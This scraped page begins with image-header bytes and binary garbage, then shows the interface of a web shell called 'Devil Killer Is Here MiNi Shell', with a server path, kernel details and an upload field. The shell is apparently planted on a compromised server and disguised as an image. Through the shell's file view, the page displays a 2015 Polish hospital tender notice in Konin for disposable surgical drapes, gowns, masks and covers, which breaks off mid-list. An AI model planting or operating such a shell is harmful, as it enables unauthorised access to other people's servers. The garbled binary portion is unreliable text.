JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150701/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150701/162006-N-2015.html

<p class="kh_header"><b>Konin: Dostawa jednorazowej bielizny operacyjnej,  akcesoriów sterylnych i wyrobów higienicznych dla potrzeb Wojewódzkiego Szpitala Zespolonego w Koninie</b><br>
<b>Numer ogłoszenia: 162006 - 2015; data zamieszczenia: 01.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony , ul. Szpitalna 45, 62-504 Konin, woj. wielkopolskie, tel. 063 2404133, faks 063 2404134.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-konin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa jednorazowej bielizny operacyjnej,  akcesoriów sterylnych i wyrobów higienicznych dla potrzeb Wojewódzkiego Szpitala Zespolonego w Koninie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa jednorazowej bielizny operacyjnej, akcesoriów sterylnych i wyrobów higienicznych dla potrzeb Wojewódzkiego Szpitala Zespolonego w Koninie. Przedmiot zamówienia został podzielony na części. Szczegółowy opis przedmiotu zamówienia wraz z ilościami oraz wymaganiami dla poszczególnych pakietów zawarty jest w  SIWZ nr WSZ-EP-28/2015, który jest udostępniony na stronie internetowej Zamawiającego www.szpital-konin.pl.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3, 33.19.90.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie zastosowano</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia zamawiający nie opisuje sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia zamawiający nie opisuje sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia zamawiający nie opisuje sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia zamawiający nie opisuje sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia zamawiający nie opisuje sposobu dokonywania oceny spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że asortyment, na który została złożona oferta jest zgodna z normami dopuszczającymi do obrotu na terenie Polski zgodnie z obowiązującymi przepisami prawa oraz, że zaoferowany produkt spełnia wszystkie wymagania zawarte  w specyfikacji istotnych warunków zamówienia Wykonawca jest zobowiązany do udostępnienia na każde żądanie Zamawiającego niżej wymienionych dokumentów:
a)	dokument będący wymogiem normy PN-EN 13795;3 czyli karty danych technicznych wystawionej przez   producenta gotowych wyrobów  po procesie sterylizacji zgodnie z obowiązującą dyrektywą Unii Europejskiej z podaniem informacji w którym z  laboratoriów  dokonano badań parametrów w/w normy. Zamawiający dopuszcza możliwość zweryfikowania w/w informacji poprzez możliwość potwierdzenia stanu faktycznego dokonanych badań oferowanych wyrobów,
b)	dla  masek chirurgicznych, dokument będący wymogiem normy PN -EN 14683, czyli karty danych technicznych  wystawionej przez producenta gotowych wyrobów, zgodnie z obowiązującą dyrektywą Unii Europejskiej,
c)	deklaracja zgodności na w/w asortyment, katalog z oznaczeniami umożliwiającymi pełną identyfikację oferowanego wyrobu ( skład wymiary itp.)  certyfikat CE</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W sytuacji kiedy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych  innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu iż będzie dysponował zasobami niezbędnymi w trakcie realizacji  zamówienia,  w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Obniżenie cen jednostkowych produktów dostarczanych przez Wykonawcę w ramach niniejszej umowy może nastąpić w każdym czasie i nie wymaga zgody Zamawiającego ani sporządzenia aneksu do umowy. 2.Zamawiający dopuszcza możliwość zmian istotnych postanowień umowy w porównaniu do treści oferty, na podstawie której dokonano wyboru Wykonawcy, przy zaistnieniu chociażby jednej z poniższych okoliczności: a)jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub w specyfikacji istotnych warunków zamówienia - w takim przypadku umowa będzie mogła zostać dopasowana do zaistniałych okoliczności, b)zmian podwykonawców, których udział w realizacji przedmiotu umowy zaakceptował   
Zamawiający, c)zmian terminu umowy, jeżeli konieczność taka wynika z okoliczności powstałych po stronie Zamawiającego lub jest skutkiem siły wyższej, d)	zmian stron umowy wynikających z następstwa prawnego, e)zmian korzystnych dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital-konin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Zespolony w Koninie, ul. Szpitalna 45, 62-504 Konin, Dział Zamówień Publicznych, pokój 3/14, II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.07.2015 godzina 10:00, miejsce: Wojewódzki Szpital Zespolony w Koninie, ul. Szpitalna 45, 62-504 Konin, Kancelaria, pokój 3/13, II piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 1, Lp., Opis przedmiotu zamówienia, Ilość [szt.]:
1. Sterylny zestaw do cystoskopii, 20;
2. Sterylny zestaw do przezcewkowych zabiegów urologicznych TUR, 20;
3. Zestaw do cięcia cesarskiego, 600;
4. Serweta okulistyczna sterylna, 650;
5. Zestaw serwet uniwersalnych   wykonanych z  laminatu, 500;
6. Sterylna serweta przeznaczona do artroskopii stawu kolanowego, wykonana z chłonnego wytrzymałego i nieprzemakalnego laminatu, 10;
7. Zestaw serwet  uniwersalnych podstawowych  do zabiegów krótkich,  600;
8. Zestaw do kraniotomii, 20;
9. Zestaw sterylny do operacji kończyny górnej, 50;
10.  Sterylny zestaw do artroskopii barku, 20;
11. Sterylna zestaw do zabiegów ginekologicznych dolnych, 250;
12. Sterylna serweta do zabiegów ginekologicznych dolnych, 50;
13. Sterylny zestaw do operacji brzuszno-kroczowych, 70;
14. Sterylny zestaw do laparoskopii brzusznej, 50;
15. Sterylny zestaw  serwet do laparoskopii ginekologicznej, 60;
16. Zestaw serwet sterylnych do operacji biodra, 20;
17. Zestaw serwet operacyjnych z tasmą lepną typu FLEX, 50;
18. Zestaw uniwersalny, wzmocniony, 50;
19. Obłożenie pacjenta samoogrzewające, 50.
Szczegółowy opis przedmiotu zamówienia wraz z ilościami oraz wymaganiami dla pakietu zawarty jest w  SIWZ nr WSZ-EP-28/2015, który jest udostępniony na stronie internetowej Zamawiającego www.szpital-konin.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostaw - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 2, Lp., Nazwa artykułu, opis, Ilość [szt.]:
1. Sterylny pełnoochronny fartuch chirurgiczny, wykonany z włókniny typu SMS, rozmiar L, 4 000;
2. Sterylny pełnoochronny fartuch chirurgiczny, wykonany z włókniny typu SMS,  rozmiar XL, 4 000;
3. Sterylny pełnoochronny fartuch chirurgiczny ,wykonany w całości   z włókniny bawełnopodobnej, jednowarstwowej typu SONTARA, rozmiar XL, 50;
4. Sterylny pełnoochronny fartuch chirurgiczny, wykonany z włókniny typu SMS, rozmiar XL, 2 000;
5. Sterylny pełnoochronny fartuch endoskopowy szeroki długi , wykonany   z włókniny typu sontara,  rozmiar XXL, 50.
Szczegółowy opis przedmiotu zamówienia wraz z ilościami oraz wymaganiami dla pakietu zawarty jest w  SIWZ nr WSZ-EP-28/2015, który jest udostępniony na stronie internetowej Zamawiającego www.szpital-konin.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostaw - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 3, Lp., Nazwa artykułu - opis,Ilość [szt.]:
1. Maska chirurgiczna 3-warstwowa, pełnobarierowa na gumki, 27 000;
2. Maska chirurgiczna 3-warstwowa wysokobarierowa z trokami/gumkami oraz nierosiejącą antyodblaskową osłoną na oczy, 200;
3. Maska chirurgiczna 3-warstwowa, pełnobarierowa zawiązywana na troki o dł min 41-45 cm, 25 000;
4. Maska chirurgiczna, ukształtowana, posiadająca szew w poprzek maski, biegnacy na wysokości górnej wargi, 14 000.
Szczegółowy opis przedmiotu zamówienia wraz z ilościami oraz wymaganiami dla pakietu zawarty jest w  SIWZ nr WSZ-EP-28/2015, który jest udostępniony na stronie internetowej Zamawiającego www.szpital-konin.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostaw - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 4, Lp., Nazwa artykułu - opis	, Ilość [szt.]:
1. Prześcieradło higieniczne, nieprzemakalne, dwuwarstwowe, foliowo - celulozowe, 20 000;
2.Podkład higieniczny nieprzemakalny z dwuwarstwowego laminatu  o wymiarach min.200 x 150, 150;
3. Pokrycie higieniczne, jednorazowe, nieprzemakalne, dwuwarstwowe, 200;
4. Podkład nieprzemakalny wzmocniony, dwuwarstwowy, foliowo-celulozowy   o wymiarze 80x100cm.  Gramatura min.  60 g/m2	4 000;
5. pokrowiec na ołowianą osłonę tarczycy 66x10cm - długość rozcięcia 15cm, 100;
6. pokrowiec na ołowianą osłonę tarczycy 66x10cm - długość rozcięcia 13cm, 100;
7. Pokrowce na obuwie z mocnej folii sciągniete gumką, 3 000.
Szczegółowy opis przedmiotu zamówienia wraz z ilościami oraz wymaganiami dla pakietu zawarty jest w  SIWZ nr WSZ-EP-28/2015, który jest udostępniony na stronie internetowej Zamawiającego www.szpital-konin.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostaw - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 5, Lp., Nazwa artykułu - opis, Ilość [szt.]:
1. Czepek chirurgiczny damski o kroju furażerki wykonany w części bocznej z włókniny pochłaniającej pot, rozmiar XL, 5 000;
2. Okrągły czepek pielęgniarski w kształcie beretu,  8 000;
3. Czepek chirurgiczny męski z podwójną wstawką pochłaniającą pot na całej szerokości czoła, ściągnięty z tyłu lekką gumką, 2 500;
4. Czepek chirurgiczny z wydlużoną częścią tylną ze ściągaczem, 2 000;
5. Czepek chirurgiczny w kształcie furażerki, wiązany na troki, rozmiar XL, 4 000;
6. Czepek chirurgiczny męski o kroju furażerki, rozmiar X L, 6 000.
Szczegółowy opis przedmiotu zamówienia wraz z ilościami oraz wymaganiami dla pakietu zawarty jest w  SIWZ nr WSZ-EP-28/2015, który jest udostępniony na stronie internetowej Zamawiającego www.szpital-konin.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostaw - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 6, Lp., Nazwa artykułu - opis, Ilość [szt.]:
1. Sterylna serweta zabiegowa o wymiarach 150x200cm, 500;
2. Sterylna serweta o wymiarach 75 x 90 cm, do stosowania podczas drobnych interwencji chirurgicznych, 1 300;
3. Sterylna serweta zabiegowa o wymiarach 100x150, 1 000;
4. Sterylna serweta o wymiarach 150 x 100 cm, 750;
5. Sterylna serweta o wymiarach 150 x 200 cm, 1 000;
6. Sterylna serweta zabiegowa wykonana z włókniny  barierowej o wymiarach 75 x 90 cm,1 300;
7. Serweta z regulowanym otworem 75x90 cm, 200;
8. Sterylna serweta o wymiarach 75x90, 500.
Szczegółowy opis przedmiotu zamówienia wraz z ilościami oraz wymaganiami dla pakietu zawarty jest w  SIWZ nr WSZ-EP-28/2015, który jest udostępniony na stronie internetowej Zamawiającego www.szpital-konin.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostaw - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 7, Lp., Nazwa artykułu - opis, Ilość [szt.]:
1. Osłona sterylna na aparaturę, z przezroczystej, dobrze układającej się folii, ściągana gumką, o średnicy 80 cm., 990;
2. Sterylna osłona foliowa z taśmami do mocowania na ramię C aparatu RTG, o wymiarach min 100 x 220 cm , 500;
3. Sterylna jednokomorowa kieszeń przylepna do irygacji wykonana z półprzeźroczystej mocnej folii o wymiarze 50x50cm z możliwością podłączenia drenu oraz z sitem, 200;
4. Zarękawek sterylny chirurgiczny, wykonany z dwuwarstwowego laminatu nieprzemakalnego, 1 000;
5. Sterylna osłona na stolik Mayo wykonana z mocnej  foli o grubości min 60 mikronów, 3 000;
6. osłona na kamerę 18x246 cm, z samouszczelniającą się końcówka, wyposażona w tasmy lepne do umocowania osłony, z mocjnej folii, 50;
7. Taśma włókninowa samoprzylepna, o wymiarach min. 9 x 49 cm sterylna, 500;
8. Sterylna osłona foliowa na przewody z mocnej przeźroczystej folii PE złożona teleskopowo z taśmami odpornymi na przemakanie do mocowania na końcówkach o wymiarach15-17cm x 200-250cm, 1 000;
9. Osłona sterylna na aparaturę o średnicy 50cm z przezroczystej, dobrze układającej się folii, ściagana gumką, 400;
10. Osłona na kończynę  Wymiary min 35x 60cm sterylna  z dwoma taśmami lepnymi, 200;
11. Nogawice chirurgiczne ginekologiczne w zestawie po 2szt. o wymiarach min. 50x110 cm, 10;
12. Kieszeń samoprzylepna dwusekcyjna o wymiarach  min 30x40cm. Sterylna, 500;
13. Torba do artroskopii stawu barkowego o wymiarach min. 83x88cm,	20;
